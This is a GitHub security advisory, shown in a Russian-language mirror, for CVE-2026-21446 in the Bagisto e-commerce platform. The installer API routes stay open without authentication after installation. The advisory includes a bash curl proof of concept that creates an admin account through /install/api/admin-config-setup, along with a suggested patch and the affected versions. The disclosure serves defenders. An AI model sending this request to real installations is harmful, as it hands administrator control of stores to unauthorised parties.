GHSA-6h7w-v2xr-mqvw

Опубликовано: 02 янв. 2026

Источник: github

Github: Прошло ревью

CVSS4: 8.8

CVSS3: 9.8

Описание

Bagisto Missing Authentication on Installer API Endpoints

Vulnerable Code

File: packages/Ibkul/Installer/src/Routes/Ib.php

<?php use Illuminate\\Session\\Middleware\\StartSession; use Illuminate\\Support\\Facades\\Route; use Ibkul\\Installer\\Http\\Controllers\\InstallerController; Route::middleware(\['Ib', 'installer\_locale'\])-\>group(function () { Route::controller(InstallerController::class)-\>group(function () { Route::get('install', 'index')-\>name('installer.index'); Route::middleware(StartSession::class)-\>prefix('install/api')-\>group(function () { Route::post('env-file-setup', 'envFileSetup')-\>name('installer.env\_file\_setup'); Route::post('run-migration', 'runMigration')-\>name('installer.run\_migration')-\>withoutMiddleware('Ib'); Route::post('run-seeder', 'runSeeder')-\>name('installer.run\_seeder')-\>withoutMiddleware('Ib'); Route::get('download-sample', 'downloadSample')-\>name('installer.download\_sample')-\>withoutMiddleware('Ib'); Route::post('admin-config-setup', 'adminConfigSetup')-\>name('installer.admin\_config\_setup')-\>withoutMiddleware('Ib'); Route::post('sample-products-setup', 'createSampleProducts')-\>name('installer.sample\_products\_setup')-\>withoutMiddleware('Ib'); }); }); });

API routes remain active even after initial installation is complete, allowing any unauthenticated attacker to:

Create admin accounts
Modify application configuration
Potentially overwrite existing data

the underlying API endpoints (/install/api/*) are directly accessible and exploitable without any authentication. An attacker can bypass the Ib installer entirely by calling the API endpoints directly.

How to Reproduce

The Ib installer UI at http://localhost:8000/install has client-side protections
However, the API endpoints are directly exploitable:
- The attack works by calling /install/api/admin-config-setup directly via curl/HTTP client
- No CSRF token, session, or authentication is required
- The Ib UI workflow is completely bypassed

Proof of Concept

#!/bin/bash # PoC: Create admin account without authentication TARGET="http://localhost:8000" # Create a new admin account curl -X POST "$TARGET/install/api/admin-config-setup" \ -H "Content-Type: application/json" \ -d '{ "admin_name": "Attacker", "admin_email": "attacker@evil.com", "admin_password": "HackedPassword123" }' echo "" echo "New admin account created!" echo "Login at: $TARGET/admin" echo "Email: attacker@evil.com"

Expected Result

The API should reject unauthenticated requests with 401/403 status.

Actual Result

The API accepts the request and creates a new admin account, allowing full administrative access to the e-commerce platform.

Recommended Patch

Add installation completion check

// In InstallerController.php or a new middleware public function __construct() { // Check if application is already installed if (file_exists(base_path('.env')) && config('app.key') && \Schema::hasTable('admins') && \DB::table('admins')->count() > 0) { abort(404, 'Application already installed'); } }

Ссылки

Пакеты

Наименование

bagisto/bagisto

composer

Затронутые версииВерсия исправления

>= 2.3.0, < 2.3.10

2.3.10

EPSS

Процентиль: 52%

0.00288

Низкий

8.8 High

CVSS4

9.8 Critical

CVSS3

CVE ID

CVE-2026-21446

Дефекты

CWE-306

Связанные уязвимости

CVE-2026-21446

CVSS3: 9.8

nvd

около 1 месяца назад

Bagisto is an open source laravel eCommerce platform. In versions on the 2.3 branch prior to 2.3.10, API routes remain active even after initial installation is complete. The underlying API endpoints (`/install/api/*`) are directly accessible and exploitable without any authentication. An attacker can bypass the Ib installer entirely by calling the API endpoints directly. This allows any unauthenticated attacker to create admin accounts, modify application configurations, and potentially overwrite existing data. Version 2.3.10 fixes the issue.

EPSS

Процентиль: 52%

0.00288

Низкий

8.8 High

CVSS4

9.8 Critical

CVSS3

CVE ID

CVE-2026-21446

Дефекты

CWE-306